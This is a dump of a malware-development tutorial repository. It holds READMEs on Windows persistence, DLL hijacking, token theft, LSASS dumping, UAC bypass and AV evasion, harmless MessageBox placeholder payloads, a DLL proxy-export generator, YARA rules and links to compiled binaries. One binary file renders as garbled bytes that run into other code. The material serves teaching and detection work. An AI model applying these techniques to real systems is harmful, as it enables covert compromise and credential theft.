example. 4 | 5 | [https://cocomelonc.github.io/malware/2022/10/09/malware-pers-14.html](https://cocomelonc.github.io/malware/2022/10/09/malware-pers-14.html) 6 | -------------------------------------------------------------------------------- /2022-10-09-malware-pers-14/hack.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | hack.cpp 3 | evil app for windows persistence via 4 | event viewer help link update 5 | author: @cocomelonc 6 | https://cocomelonc.github.io/malware/2022/10/09/malware-pers-14.html 7 | */ 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 12 | MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK); 13 | return 0; 14 | } 15 | -------------------------------------------------------------------------------- /2022-10-09-malware-pers-14/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-10-09-malware-pers-14/hack.exe -------------------------------------------------------------------------------- /2022-10-09-malware-pers-14/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-10-09-malware-pers-14/pers.exe -------------------------------------------------------------------------------- /2022-10-12-malware-pers-15/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 15. C++ malware implementation. 2 | 3 | Malware persistence technique - via hijacking Microsoft Internet Explorer DLL. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/malware/2022/10/12/malware-pers-15.html](https://cocomelonc.github.io/malware/2022/10/12/malware-pers-15.html) 6 | -------------------------------------------------------------------------------- /2022-10-12-malware-pers-15/dll-def.py: -------------------------------------------------------------------------------- 1 | import pefile 2 | import sys 3 | import os.path 4 | 5 | dll = pefile.PE(sys.argv[1]) 6 | dll_basename = os.path.splitext(sys.argv[1])[0] 7 | 8 | try: 9 | with open(sys.argv[1].split("/")[-1].replace(".dll", ".def"), "w") as f: 10 | f.write("EXPORTS\n") 11 | for export in dll.DIRECTORY_ENTRY_EXPORT.symbols: 12 | if export.name: 13 | f.write('{}={}.{} @{}\n'.format(export.name.decode(), dll_basename, export.name.decode(), export.ordinal)) 14 | except: 15 | print ("failed to create .def file :(") 16 | else: 17 | print ("successfully create .def file :)") 18 | -------------------------------------------------------------------------------- /2022-10-12-malware-pers-15/evil.c: -------------------------------------------------------------------------------- 1 | /* 2 | evil.c - malicious DLL 3 | DLL hijacking with exported functions example 4 | author: @cocomelonc 5 | */ 6 | 7 | #include 8 | #pragma comment (lib, "user32.lib") 9 | 10 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { 11 | switch (ul_reason_for_call) { 12 | case DLL_PROCESS_ATTACH: 13 | MessageBox( 14 | NULL, 15 | "Meow-woof!", 16 | "=^..^=", 17 | MB_OK 18 | ); 19 | break; 20 | case DLL_PROCESS_DETACH: 21 | break; 22 | case DLL_THREAD_ATTACH: 23 | break; 24 | case DLL_THREAD_DETACH: 25 | break; 26 | } 27 | return TRUE; 28 | } 29 | -------------------------------------------------------------------------------- /2022-10-12-malware-pers-15/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-10-12-malware-pers-15/evil.dll -------------------------------------------------------------------------------- /2022-10-12-malware-pers-15/suspend.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-10-12-malware-pers-15/suspend.dll -------------------------------------------------------------------------------- /2022-10-21-malware-pers-16/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 16. C++ malware implementation. 2 | 3 | Malware persistence technique - via hijacking Cryptography DLL path at the Registry. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/malware/2022/10/21/malware-pers-16.html](https://cocomelonc.github.io/malware/2022/10/21/malware-pers-16.html) 6 | -------------------------------------------------------------------------------- /2022-10-21-malware-pers-16/hack.c: -------------------------------------------------------------------------------- 1 | /* 2 | hack.c - malicious DLL 3 | DLL hijacking Cryptography registry path 4 | author: @cocomelonc 5 | */ 6 | 7 | #include 8 | #pragma comment (lib, "user32.lib") 9 | 10 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { 11 | switch (ul_reason_for_call) { 12 | case DLL_PROCESS_ATTACH: 13 | MessageBox( 14 | NULL, 15 | "Meow-meow!", 16 | "=^..^=", 17 | MB_OK 18 | ); 19 | break; 20 | case DLL_PROCESS_DETACH: 21 | break; 22 | case DLL_THREAD_ATTACH: 23 | break; 24 | case DLL_THREAD_DETACH: 25 | break; 26 | } 27 | return TRUE; 28 | } 29 | -------------------------------------------------------------------------------- /2022-10-21-malware-pers-16/hack.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-10-21-malware-pers-16/hack.dll -------------------------------------------------------------------------------- /2022-10-21-malware-pers-16/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-10-21-malware-pers-16/pers.exe -------------------------------------------------------------------------------- /2022-10-28-malware-pers-17/hack.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | hack.cpp 3 | evil app for windows persistence via 4 | change.exe 5 | author: @cocomelonc 6 | https://cocomelonc.github.io/malware/2022/10/28/malware-pers-17.html 7 | */ 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 12 | MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK); 13 | return 0; 14 | } 15 | -------------------------------------------------------------------------------- /2022-10-28-token-theft-2/README.md: -------------------------------------------------------------------------------- 1 | # APT techniques: Access Token theft via UpdateProcThreadAttribute. C++ malware implementation. 2 | 3 | APT techniques: Access Token theft via UpdateProcThreadAttribute and CreateProcessW. C++ implementation example. 4 | 5 | [https://cocomelonc.github.io/tutorial/2022/10/28/token-theft-2.html](https://cocomelonc.github.io/tutorial/2022/10/28/token-theft-2.html) 6 | -------------------------------------------------------------------------------- /2022-10-28-token-theft-2/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-10-28-token-theft-2/hack.exe -------------------------------------------------------------------------------- /2022-11-02-malware-pers-18/README.md: -------------------------------------------------------------------------------- 1 | # Malware development: persistence - part 18. C++ malware implementation. 2 | 3 | Malware persistence technique - via Windows Error Reporting. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html](https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html) 6 | -------------------------------------------------------------------------------- /2022-11-02-malware-pers-18/hack.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | meow-meow messagebox 3 | author: @cocomelonc 4 | */ 5 | #include 6 | 7 | #pragma comment (lib, "user32.lib") 8 | 9 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 10 | MessageBoxA(NULL, "Meow-meow!","=^..^=", MB_OK); 11 | return 0; 12 | } 13 | -------------------------------------------------------------------------------- /2022-11-02-malware-pers-18/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-11-02-malware-pers-18/hack.exe -------------------------------------------------------------------------------- /2022-11-02-malware-pers-18/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-11-02-malware-pers-18/pers.exe -------------------------------------------------------------------------------- /2022-11-05-malware-analysis-6/aes.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-11-05-malware-analysis-6/aes.bin -------------------------------------------------------------------------------- /2022-11-05-malware-analysis-6/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-11-05-malware-analysis-6/hack.exe -------------------------------------------------------------------------------- /2022-11-05-malware-analysis-6/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-11-05-malware-analysis-6/hack2.exe -------------------------------------------------------------------------------- /2022-11-05-malware-analysis-6/meow.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2022-11-05-malware-analysis-6/meow.bin -------------------------------------------------------------------------------- /2022-11-05-malware-analysis-6/xor.bin: -------------------------------------------------------------------------------- 1 | ‘1ò‘€šŒ³ret*48=+"#8T -è J#î+uG;þ"EL;î"[ 8 | #pragma comment (lib, "user32.lib") 9 | 10 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { 11 | MessageBox(NULL, "Meow-meow!", "=^..^=", MB_OK); 12 | return 0; 13 | } 14 | -------------------------------------------------------------------------------- /2023-01-20-malware-pers-21/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-01-20-malware-pers-21/hack.exe -------------------------------------------------------------------------------- /2023-01-20-malware-pers-21/pers.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-01-20-malware-pers-21/pers.exe -------------------------------------------------------------------------------- /2023-01-27-malware-analysis-7/README.md: -------------------------------------------------------------------------------- 1 | # Malware analysis: part 7. Yara rule for CRC32. 2 | 3 | Malware analysis: part 7. Hash WinAPI function names via CRC32. C++ malware implementation example. CRC32 in REvil ransomware 4 | 5 | [https://cocomelonc.github.io/malware/2023/02/02/malware-analysis-7.html](https://cocomelonc.github.io/malware/2023/02/02/malware-analysis-7.html) 6 | -------------------------------------------------------------------------------- /2023-01-27-malware-analysis-7/crc32.py: -------------------------------------------------------------------------------- 1 | import zlib 2 | 3 | # crc32 4 | def crc32(data): 5 | hash = zlib.crc32(data) 6 | print ("0x%08x" % hash) 7 | print (hash) 8 | return hash 9 | 10 | crc32(b"MessageBoxA") 11 | -------------------------------------------------------------------------------- /2023-01-27-malware-analysis-7/crc32.yar: -------------------------------------------------------------------------------- 1 | rule crc32_hash 2 | { 3 | meta: 4 | author = "cocomelonc" 5 | description = "crc32 constants" 6 | strings: 7 | $c = { 2083B8ED } 8 | condition: 9 | $c 10 | } 11 | -------------------------------------------------------------------------------- /2023-01-27-malware-analysis-7/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-01-27-malware-analysis-7/hack.exe -------------------------------------------------------------------------------- /2023-01-27-malware-analysis-7/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-01-27-malware-analysis-7/hack2.exe -------------------------------------------------------------------------------- /2023-02-10-malware-analysis-8/README.md: -------------------------------------------------------------------------------- 1 | # Malware analysis - part 8. Yara rule example for MurmurHash2. C++ malware implementation. 2 | 3 | Yara rule for WinAPI functions call by MurmurHash. MurmurHash2 in Conti. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/02/10/malware-analysis-8.html](https://cocomelonc.github.io/malware/2023/02/10/malware-analysis-8.html) 6 | -------------------------------------------------------------------------------- /2023-02-10-malware-analysis-8/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-02-10-malware-analysis-8/hack.exe -------------------------------------------------------------------------------- /2023-02-10-malware-analysis-8/murmur.py: -------------------------------------------------------------------------------- 1 | def murmurhash2(key: bytes, seed: int) -> int: 2 | m = 0x5bd1e995 3 | r = 24 4 | h = seed ^ len(key) 5 | data = bytearray(key) + b'\x00' * (4 - (len(key) & 3)) 6 | data = memoryview(data).cast("I") 7 | for i in range(len(data) // 4): 8 | k = data[i] 9 | k *= m 10 | k ^= k >> r 11 | k *= m 12 | h *= m 13 | h ^= k 14 | h ^= h >> 13 15 | h *= m 16 | h ^= h >> 15 17 | return h 18 | 19 | h = murmurhash2(b"meow-meow", 0) 20 | print ("%x" % h) 21 | print ("%d" % h) -------------------------------------------------------------------------------- /2023-02-10-malware-analysis-8/murmur.yar: -------------------------------------------------------------------------------- 1 | rule murmurhash2_rule { 2 | meta: 3 | author = "cocomelonc" 4 | description = "example rule using MurmurHash2A with constant 0x5bd1e995" 5 | strings: 6 | $hash = { 95 e9 d1 5b } 7 | condition: 8 | $hash 9 | } 10 | -------------------------------------------------------------------------------- /2023-02-13-malware-av-evasion-11/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev: AV engines evasion techniques - part 11. C++ malware implementation. 2 | 3 | AV engines evasion via encrypt and decrypt payload with DES algorithm. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/02/13/malware-av-evasion-11.html](https://cocomelonc.github.io/malware/2023/02/12/malware-av-evasion-11.html) 6 | -------------------------------------------------------------------------------- /2023-02-13-malware-av-evasion-11/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-02-13-malware-av-evasion-11/hack.exe -------------------------------------------------------------------------------- /2023-02-13-malware-av-evasion-11/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-02-13-malware-av-evasion-11/hack2.exe -------------------------------------------------------------------------------- /2023-02-13-malware-av-evasion-11/hack3.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-02-13-malware-av-evasion-11/hack3.exe -------------------------------------------------------------------------------- /2023-02-20-malware-av-evasion-12/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-02-20-malware-av-evasion-12/hack.exe -------------------------------------------------------------------------------- /2023-02-20-malware-av-evasion-12/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-02-20-malware-av-evasion-12/hack2.exe -------------------------------------------------------------------------------- /2023-02-20-malware-av-evasion-12/hack3.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-02-20-malware-av-evasion-12/hack3.exe -------------------------------------------------------------------------------- /2023-02-20-malware-av-evasion-12/hack4.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-02-20-malware-av-evasion-12/hack4.exe -------------------------------------------------------------------------------- /2023-03-09-malware-av-evasion-13/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev: AV engines evasion techniques - part 13. C++ malware implementation. 2 | 3 | AV engines evasion via encrypt and decrypt payload with Madryga algorithm. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/03/09/malware-av-evasion-13.html](https://cocomelonc.github.io/malware/2023/03/09/malware-av-evasion-13.html) 6 | -------------------------------------------------------------------------------- /2023-03-09-malware-av-evasion-13/madryga.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-03-09-malware-av-evasion-13/madryga.exe -------------------------------------------------------------------------------- /2023-03-09-malware-av-evasion-13/meow.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-03-09-malware-av-evasion-13/meow.bin -------------------------------------------------------------------------------- /2023-03-09-malware-av-evasion-13/meow.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | 3 | output = "" 4 | plaintext = open("./meow.bin", "rb").read() 5 | for i in range(len(plaintext)): 6 | current = plaintext[i] 7 | ordd = lambda x: x if isinstance(x, int) else ord(x) 8 | output += chr(ordd(current)) 9 | cbytes = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in output) + ' };' 10 | print (cbytes) -------------------------------------------------------------------------------- /2023-03-24-malware-av-evasion-14/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev: AV engines evasion techniques - part 14. C++ malware implementation. 2 | 3 | AV engines evasion via encrypt and decrypt payload with A5/1 GSM algorithm. C++ malware implementation example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/03/24/malware-av-evasion-14.html](https://cocomelonc.github.io/malware/2023/03/24/malware-av-evasion-14.html) 6 | -------------------------------------------------------------------------------- /2023-03-24-malware-av-evasion-14/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-03-24-malware-av-evasion-14/hack.exe -------------------------------------------------------------------------------- /2023-03-24-malware-av-evasion-14/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-03-24-malware-av-evasion-14/hack2.exe -------------------------------------------------------------------------------- /2023-03-24-malware-av-evasion-14/hack3.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-03-24-malware-av-evasion-14/hack3.exe -------------------------------------------------------------------------------- /2023-04-08-malware-av-evasion-15/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev: AV engines evasion techniques - part 15. C++ malware implementation. 2 | 3 | AV engines evasion via own `GetModuleHandle` implementation. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/04/08/malware-av-evasion-15.html](https://cocomelonc.github.io/malware/2023/04/08/malware-av-evasion-15.html) 6 | -------------------------------------------------------------------------------- /2023-04-08-malware-av-evasion-15/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-04-08-malware-av-evasion-15/hack.exe -------------------------------------------------------------------------------- /2023-04-16-malware-av-evasion-16/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev: AV engines evasion techniques - part 16. C++ malware implementation. 2 | 3 | AV engines evasion via own `GetProcAddress` implementation. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/04/16/malware-av-evasion-16.html](https://cocomelonc.github.io/malware/2023/04/16/malware-av-evasion-16.html) 6 | -------------------------------------------------------------------------------- /2023-04-16-malware-av-evasion-16/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-04-16-malware-av-evasion-16/hack.exe -------------------------------------------------------------------------------- /2023-04-27-malware-tricks-27/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev tricks - part 27. C++ malware implementation. 2 | 3 | Malware dev trick - part 27: own `LoadLibrary` implementation. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/04/27/malware-tricks-27.html](https://cocomelonc.github.io/malware/2023/04/27/malware-tricks-27.html) 6 | -------------------------------------------------------------------------------- /2023-04-27-malware-tricks-27/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-04-27-malware-tricks-27/hack.exe -------------------------------------------------------------------------------- /2023-04-27-malware-tricks-27/pet.c: -------------------------------------------------------------------------------- 1 | /* 2 | pet.dll - DLL example for LoadLibrary 3 | */ 4 | 5 | #include 6 | #pragma comment (lib, "user32.lib") 7 | 8 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { 9 | switch (ul_reason_for_call) { 10 | case DLL_PROCESS_ATTACH: 11 | break; 12 | case DLL_PROCESS_DETACH: 13 | break; 14 | case DLL_THREAD_ATTACH: 15 | break; 16 | case DLL_THREAD_DETACH: 17 | break; 18 | } 19 | return TRUE; 20 | } 21 | 22 | __declspec(dllexport) int _cdecl Cat() { 23 | MessageBox(NULL, "meow-meow", "=^..^=", MB_OK); 24 | return 1; 25 | } 26 | 27 | __declspec(dllexport) int _cdecl Mouse() { 28 | MessageBox(NULL, "squeak-squeak", "<:3()~", MB_OK); 29 | return 1; 30 | } -------------------------------------------------------------------------------- /2023-04-27-malware-tricks-27/pet.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-04-27-malware-tricks-27/pet.dll -------------------------------------------------------------------------------- /2023-05-11-malware-tricks-28/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev trick - part 28. C++ malware implementation. 2 | 3 | Malware dev trick - part 28: dumping `LSASS` implementation. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/05/11/malware-tricks-28.html](https://cocomelonc.github.io/malware/2023/05/11/malware-tricks-28.html) 6 | -------------------------------------------------------------------------------- /2023-05-11-malware-tricks-28/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-05-11-malware-tricks-28/hack.exe -------------------------------------------------------------------------------- /2023-05-22-malware-tricks-29/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev tricks - part 29. C++ malware implementation. 2 | 3 | Malware dev tricks - part 29: store binary data in Windows Registry. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html](https://cocomelonc.github.io/malware/2023/05/22/malware-tricks-29.html) 6 | -------------------------------------------------------------------------------- /2023-05-22-malware-tricks-29/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-05-22-malware-tricks-29/hack.exe -------------------------------------------------------------------------------- /2023-05-22-malware-tricks-29/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-05-22-malware-tricks-29/hack2.exe -------------------------------------------------------------------------------- /2023-05-26-malware-tricks-30/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev trick - part 30. C++ malware implementation. 2 | 3 | Malware dev trick - part 30: find PID via `NtGetNextProcess`. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/05/26/malware-tricks-30.html](https://cocomelonc.github.io/malware/2023/05/26/malware-tricks-30.html) 6 | -------------------------------------------------------------------------------- /2023-05-26-malware-tricks-30/evil.c: -------------------------------------------------------------------------------- 1 | /* 2 | evil.cpp 3 | simple DLL for DLL inject to process 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html 6 | */ 7 | 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { 12 | switch (nReason) { 13 | case DLL_PROCESS_ATTACH: 14 | MessageBox( 15 | NULL, 16 | "Meow from evil.dll!", 17 | "=^..^=", 18 | MB_OK 19 | ); 20 | break; 21 | case DLL_PROCESS_DETACH: 22 | break; 23 | case DLL_THREAD_ATTACH: 24 | break; 25 | case DLL_THREAD_DETACH: 26 | break; 27 | } 28 | return TRUE; 29 | } 30 | -------------------------------------------------------------------------------- /2023-05-26-malware-tricks-30/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-05-26-malware-tricks-30/evil.dll -------------------------------------------------------------------------------- /2023-05-26-malware-tricks-30/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-05-26-malware-tricks-30/hack.exe -------------------------------------------------------------------------------- /2023-05-26-malware-tricks-30/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-05-26-malware-tricks-30/hack2.exe -------------------------------------------------------------------------------- /2023-06-04-malware-tricks-31/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev trick - part 31. C++ malware implementation. 2 | 3 | Malware dev trick - part 31: run shellcode via `SetTimer`. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/06/04/malware-tricks-31.html](https://cocomelonc.github.io/malware/2023/06/04/malware-tricks-31.html) 6 | -------------------------------------------------------------------------------- /2023-06-04-malware-tricks-31/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-06-04-malware-tricks-31/hack.exe -------------------------------------------------------------------------------- /2023-06-07-syscalls-1/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev trick - part 32. Syscalls - part 1. C++ malware implementation. 2 | 3 | Malware dev trick - part 32, intro to windows syscalls. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/06/07/syscalls-1.html](https://cocomelonc.github.io/malware/2023/06/07/syscalls-1.html) 6 | -------------------------------------------------------------------------------- /2023-06-07-syscalls-1/evil.c: -------------------------------------------------------------------------------- 1 | /* 2 | evil.c 3 | simple DLL for DLL inject to process 4 | author: @cocomelonc 5 | https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html 6 | */ 7 | 8 | #include 9 | #pragma comment (lib, "user32.lib") 10 | 11 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) { 12 | switch (nReason) { 13 | case DLL_PROCESS_ATTACH: 14 | MessageBox( 15 | NULL, 16 | "Meow-meow!", 17 | "=^..^=", 18 | MB_OK 19 | ); 20 | break; 21 | case DLL_PROCESS_DETACH: 22 | break; 23 | case DLL_THREAD_ATTACH: 24 | break; 25 | case DLL_THREAD_DETACH: 26 | break; 27 | } 28 | return TRUE; 29 | } -------------------------------------------------------------------------------- /2023-06-07-syscalls-1/evil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-06-07-syscalls-1/evil.dll -------------------------------------------------------------------------------- /2023-06-07-syscalls-1/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-06-07-syscalls-1/hack.exe -------------------------------------------------------------------------------- /2023-06-07-syscalls-1/hack2.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-06-07-syscalls-1/hack2.exe -------------------------------------------------------------------------------- /2023-06-09-syscalls-2/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev trick - part 33. Syscalls - part 2. C++ malware implementation. 2 | 3 | Malware dev trick - part 33, example of a created syscall in an assembly file. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/06/09/syscalls-2.html](https://cocomelonc.github.io/malware/2023/06/09/syscalls-2.html) 6 | -------------------------------------------------------------------------------- /2023-06-09-syscalls-2/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-06-09-syscalls-2/hack.exe -------------------------------------------------------------------------------- /2023-06-09-syscalls-2/hack.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-06-09-syscalls-2/hack.o -------------------------------------------------------------------------------- /2023-06-09-syscalls-2/syscall.asm: -------------------------------------------------------------------------------- 1 | section .text 2 | global myNtAllocateVirtualMemory 3 | myNtAllocateVirtualMemory: 4 | mov r10, rcx 5 | mov eax, 18h ; syscall number for NtAllocateVirtualMemory 6 | syscall 7 | ret -------------------------------------------------------------------------------- /2023-06-09-syscalls-2/syscall.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-06-09-syscalls-2/syscall.o -------------------------------------------------------------------------------- /2023-06-19-malware-av-evasion-17/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev: AV engines evasion techniques - part 17. C++ malware implementation. 2 | 3 | AV engines evasion - part 17. First step: bypass UAC via `fodhelp.exe` via Registry modification. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html](https://cocomelonc.github.io/malware/2023/06/19/malware-av-evasion-17.html) 6 | -------------------------------------------------------------------------------- /2023-06-19-malware-av-evasion-17/hack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cocomelonc/meow/6d888acc9ce03d464137423058aa5573fb3d2250/2023-06-19-malware-av-evasion-17/hack.exe -------------------------------------------------------------------------------- /2023-06-26-malware-av-evasion-18/README.md: -------------------------------------------------------------------------------- 1 | # Malware dev: AV engines evasion techniques - part 18. C++ malware implementation. 2 | 3 | AV engines evasion via modular multiplication-based block cipher. C++ malware example. 4 | 5 | [https://cocomelonc.github.io/malware/2023/06/26/malware-av-evasion-18.html](https://cocomelonc.github.io/malware/2023/06/26/malware-av-evasion-18.html) 6 | -------------------------------------------------------------------------------- /2023-06-26-malware-av-evasion-18/hack.exe: 